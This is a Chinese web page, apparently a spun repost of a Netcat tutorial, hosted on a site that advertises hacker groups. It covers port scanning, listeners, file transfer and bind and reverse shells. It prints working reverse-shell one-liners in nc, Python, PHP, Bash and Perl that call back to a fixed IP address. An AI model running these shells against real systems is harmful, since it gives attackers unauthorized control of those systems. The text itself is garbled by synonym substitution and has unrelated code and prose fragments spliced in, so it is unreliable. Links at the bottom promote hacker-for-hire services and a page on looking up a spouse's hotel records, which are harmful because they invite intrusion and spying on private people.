黑客 *** 群:“瑞士军刀”Netcat使用 *** 总结

访客5年前黑客资讯1200

最近在做浸透检验的时分遇到了端口监听和shell的反弹问题,在这个进程中自己对Netcat这一款神器有了新的知道,现将一些Netcat的用法做一个小总结,期望对各位有协助!

Netcat简介

Netcat是一款十分知名的 *** 工具,简称“NC”,有浸透检验中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、长途文件传输、还可以完成长途shell等功用。总归功用强壮,可以用一句较为幽默的话来描述NC的强壮——“你的想象力是限制NC的瓶颈”。

Netcat选项参数阐明

 

功用阐明:端口扫描、端口监听、长途文件传输、长途shell等等;

语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<推迟秒数>][-o<输出文件>][-p<通讯端口>][-s<来历位址>][-v...][-w<超时秒数>][主机称号][通讯端口...]

参  数:

-g <网关> 设置路由器跃程通讯网关,最多可设置8个;

 -G <指向器数目> 设置来历路由指向器,其数值为4的倍数;

 -h 在线协助; 

-i <推迟秒数> 设置时刻距离,以便传送信息及扫描通讯端口;

 -l 运用监听方式,管控传入的材料;

 -n 直接运用IP地址,而不通过域名服务器;

 -o <输出文件> 指定文件称号,把来往传输的数据以16进制字码倾倒成该文件保存;

 -p <通讯端口> 设置本地主机运用的通讯端口;

 -r 乱数指定本地与远端主机的通讯端口;

 -s <来历位址> 设置本地主机送出数据包的IP地址;

 -u 运用UDP传输协议;

 -v 显现指令实行进程;

 -w <超时秒数> 设置等候连线的时刻;

 -z 运用0输入/输出方式,只在扫描通讯端口时运用。

Netcat简易运用衔接到长途主机

 

指令:nc  -nvv Targert_IP  Targert_Port

 

监听本地主机

 

指令:nc  -l  -p  Local_Port

 

端口扫描

扫描指定主机的单一端口是否敞开

 

格局:nc  -v  target_IP  target_Port

&nbsp

这儿也需求留心几个问题:

;

扫描指定主机的某个端口段的端口敞开信息

 

格局:nc  -v  -z  Target_IP   Target_Port_Start  -  Target_Port_End

 

扫描指定主机的某个UDP端口段,而且回来端口信息

 

格局:nc -v   -z  -u  Target_IP  Target_Port_Start   -   Target_Port_End

 

扫描指定主机的端口段信息,而且设置超时时刻为3秒

 

格局:nc  -vv(-v) -z  -w  time  Target_IP   Target_Port_Start-Targert_Port_End

 

端口监听

监听本地端口

 

格局:nc  -l  -p  local_Port

 

注:先设置监听(不能呈现端口抵触),之后假设有外来访问则输出该详细信息到指令行

监听本地端口,而且将监听到的信息保存到指定的文件中

 

格局:nc -l  -p local_Port > target_File

衔接长途系统

 

格局:nc Target_IP  Target_Port

 

之后可以工作HTTP恳求

FTP匿名勘探

 

格局:nc Targert_IP  21

 

文件传输

传输端:

 

格局:nc  Targert_IP  Targert_Port  <  Targert_File

 

接纳端:

 

格局:nc   -l  Local_Port  >  Targert_File

 



简易谈天

本地主机

指令:nc   -l   8888

长途主机

指令:nc Targert_IP    Targert_Port

蜜罐

作为蜜罐运用1:

指令:nc -L -p  Port

注:运用“-L”参数可以不断的监听某一个端口,知道Ctrl+C停止

作为蜜罐运用2:

指令:nc -L -p  Port >log.txt

注:运用“-L”参数可以不断的监听某一个端口,知道Ctrl+C停止,一同把成果输出到log.txt文件中,假设把“>”改为“>>”即追加到文件之后。

这一个指令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,可是自己可以去找找,这儿仅仅想到了之前的这个运用,所以提出来简略介绍一下!

获取shell

简述:获取shell分为两种,一种是正向shell,一种是方向shell。假设客户端衔接服务器端,想要获取服务器端的shell,那么称为正向shell,假设是客户端衔接服务器,服务器端想要获取客户端的shell,那么称为反向shell

正向shell

本地主机:

指令:nc   Targert_IP  Targert_Por针对一个数据集的特征构建有许多 *** ,所得的特征也各有不同。今天出于实验的考虑,我们用两种 *** 来构建特征。t 

方针主机:

指令:nc  -lvp  Targert_Port   -e  /bin/sh  

反向shell

本地主机:

指令: nc -lvp  Target_Port

方针主机:

指令: nc  Targert_IP Targert_Port  -e /bin/sh

特殊情况——方针主机上没有Netcat,怎样获取反向shell

在一般情况下,方针主机上一般都是不会有Netcat的,此刻就需要运用其他代替的 *** 来完成反向链接到达进犯主机的意图,下面简略的介绍几种反向shell的设置。

python反向shell

方针主机端实行句子:

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

本地主机

方针主机

PHP反向shell

方针主机端实行句子:

 

php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'

本地主机:

 

方针主机:

Bash反向shell

方针主机端实行句子:

bash -i>&/dev/tcp/192.168.11.144/2222 0>&1

本地主机:

方针主机:

Perl反向shell

方针主机端实行句子:

 

 

perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

本地主机

 

方针主机

 

注:书写的时分必定要注意这儿单引号、双引号是英文格局的,否则会报过错!

总结:有一句话为“温故而知新”,一同又有一句话为“实践出真知”,当这两句话一同饯别的时分,就会擦出不一样的火花,你会看到你之前未见到的,把握到你之前陌生的技术!Netcat当然查询的厂商列表如下:好用,可是也要通过实践才知道,那你还在等什么呢?

*本文作者:Fly前途似锦,转载请注明来自 FreeBuf.COM

黑客 *** 群:“瑞士军刀”Netcat使用 *** 总结

*/#define _GNU_SOURCE补偿:“瑞士军刀”Netcat使用 *** 总结

黑客 *** 群怎样工作插件ATM包括两个首要的部分:cabinet和safe。Cabinet也就是ATM的主体部分包括ATM计算机,这是与 *** 设备、读卡器、键盘、现金出口等设备相连的。Safe部分是由钢筋做成的,含有吐钞口和钞票进口等模块。计算机一般工作的都是Windows系统,不过是一种专门为ATM所规划的嵌入式版别。只需管理员或许访问Windows系统,其他用户是不能访问的。所以用户看到的运用是工作在kiosk方式下的。 false先去找到user32.IsMenu ***

root soft nofile 100000工作完我们继续触发溃散。Arbitrary Code Guard(任意代码关照卫士)黑客 *** 群

tp_sizeof_priv int32

例如 bcrypt 算法就运用了类似思想,它在核算进程中一再访问 4KB 的内存空间,然后消耗带宽资源。

[1][2]黑客接单网

我们来试试将frida注入父进程。 “瑞士军刀”Netcat使用 *** 总结

黑客 *** 群图5Firefox40中用户禁用未签名的扩展2、运维堡垒机cknife:[项目地址],这把刀可以自定义各种通讯 *** 和php实行函数用于绕过waf检测。实践检验下来,的确许多家waf的默许战略对自定义方式阻挠无力。

密文和盐的更新与不可追溯#include "sodium.h"黑客 *** 群

服务端+应战支撑和附和的特性。

微软的文件数字签名验证我们必定听说过。微软为系统的要害文件引入数字签名的机制,是为了维护系统的无缺性。因为操作系统的要害文件的无缺性十分重要,只需确保了它们的无缺和不被篡改,才华确保系统的安全和平稳工作。Windows 10系统就内置了文件签名验证的东西,可以很方便地检查系统文件的无缺性和安全性。一同,关于外来设备的程序和驱动,也可以检查。通过它可以找出系统中“不明身份”的文件。

{fonttbl{f0froman Tms Rmn;}{f1fdecor Symbol;}{f2fswiss Helv;}} "os",“瑞士军刀”Netcat使用 *** 总结

MIKEY-SAKKE存在后门,可解密全部VoIP通讯mysql_query($sql) or die(mysql_error());096b0091 ba555593c5 mov edx,0C5935555h 假设因为网速太慢等原因我们只能进行时刻短更新,所以我们要保证先发送关于危险网站的信息,更新真的需求精密核算。我们还和Google的紧缩团队协作,把我们的数据尽或许的紧缩的越小越好,这样才华保证数据传输尽或许不给用户的运用构成影响。
本文标题:黑客 *** 群:“瑞士军刀”Netcat使用 *** 总结

相关文章

双十一复杂费脑子感慨 双十一太难了心情说说

双十一复杂费脑子感慨 双十一太难了心情说说

觉得如今的双十一的标准一年比一年不便和繁杂,有些人表明为了更好地双十一买一个物品真的是太耗头脑了,我就而言说有关双十一标准太繁杂的心情短语吧。 双十一繁杂费头脑感叹  2020年双十一,物品没...

山海镜花悬赏最小的金乌在哪打 山海镜花金乌十郎位置介绍

山海镜花悬赏最小的金乌在哪打 山海镜花金乌十郎位置介绍

在山海镜花游戏中悬赏最小的金乌就是金乌十郎,不过不少小伙伴们都还不知道山海镜花悬赏最小的金乌分布在哪,那么下面小编就为大家带来山海镜花悬赏最小的金乌位置介绍,去看看吧。 山海镜花金乌十郎位置介绍...

王者荣耀体验服申请教程地址每天可申请

王者荣耀体验服资格申请每天都可以了,如果今天没名额了0点蹲点申请就行。 地址:https://pvp.qq.com/cp/a20161115tyf/page1.shtml 资格获取...

爱国黑客联盟(十大黑客联盟)

爱国黑客联盟(十大黑客联盟)

atp红客家族是什么 ATP——腺嘌呤核苷三磷酸 核糖与碱基腺嘌呤脱水结合形成腺苷,腺苷再结合上三分子磷酸基团就形成了三磷酸腺苷,英文简写为ATP。一种不稳定的高能化合物,生物体内最直接的能量来源。简...

人为什么会出现幻觉?常见幻觉的四种类型

人为什么会出现幻觉?常见幻觉的四种类型

人为什么会出现幻觉(常见幻觉的四种类型)幻觉是一种虚幻的知觉,它是指在没有客观刺激的条件下产生的知觉体验。也就是说幻觉一种主观体验,是常见的知觉障碍和精神症状。幻觉与错觉不同,幻觉有客观刺激的存在,其...

怎么查我老公的开房记录

1 12月17日,正午阳光出品年度大剧《大江大河2》发布“时代”版片花,宣布将于12月20日正式开播。王凯饰演的宋运辉在《大江2》里将开启职业生涯新篇章,同时片...